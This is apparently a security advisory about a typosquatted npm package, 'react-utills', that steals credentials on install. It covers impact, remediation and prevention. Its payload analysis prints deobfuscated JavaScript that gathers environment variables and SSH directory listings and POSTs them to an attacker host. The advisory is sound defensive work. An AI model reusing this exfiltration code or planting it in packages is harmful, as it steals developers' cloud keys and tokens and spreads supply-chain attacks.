[TIMESTAMP: 2024-01-25 00:00 UTC] [AUTHOR: Jordan Kim] [SEVERITY: HIGH]

Malicious npm Package Targets React Developers with Backdoored Polyfill


Incident Summary

A malicious package named react-utills (note the double ‘l’) was published to the npm registry on January 18, 2024. It closely mimicked the legitimate react-utils package, which has over 2 million weekly downloads.

The package remained live for 7 days before being reported by a security researcher and removed by npm. During that time it was downloaded 47,312 times.

Malicious Payload Analysis

The package appeared functionally identical to the legitimate library on the surface but included an additional obfuscated script in index.js:

// Deobfuscated malicious payload
const os = require('os');
const fs = require('fs');
const https = require('https');

function exfiltrate() {
  const data = {
    env: process.env,           // All environment variables (API keys, tokens)
    home: os.homedir(),
    ssh: fs.existsSync(`${os.homedir()}/.ssh`)
      ? fs.readdirSync(`${os.homedir()}/.ssh`)
      : null,
  };

  // Send to attacker C2
  const req = https.request({
    hostname: 'telemetry-cdn[.]com',
    path: '/collect',
    method: 'POST',
  });
  req.write(JSON.stringify(data));
  req.end();
}

// Runs on package installation
exfiltrate();

Impact Assessment

The exfiltration script runs during npm install, meaning developers who installed the package may have exposed:

  • AWS/GCP/Azure credentials stored as environment variables
  • API keys in .env files loaded in the shell
  • SSH private key file listing (not content, but names)
  • npm_token and NPM_TOKEN variables (enabling further supply chain attacks)

Affected CI/CD Pipelines

Particular concern exists for automated pipelines where npm install runs in environments with cloud provider credentials injected as environment variables — a common pattern in CI/CD systems.

Remediation Steps

If you installed react-utills:

  1. Rotate all credentials — AWS IAM keys, API tokens, service account keys.
  2. Audit CI/CD secrets — Review and rotate any secrets accessible from your build environment.
  3. Check for persistence — Look for unfamiliar cron jobs or startup scripts added post-install.
  4. Review outbound connections — Check logs for connections to telemetry-cdn[.]com.

Prevention

  • Enable npm audit in your CI pipeline.
  • Use package lock verification and dependency pinning.
  • Consider tools like Socket Security or Snyk for supply chain monitoring.
  • Implement network egress filtering in your build environments.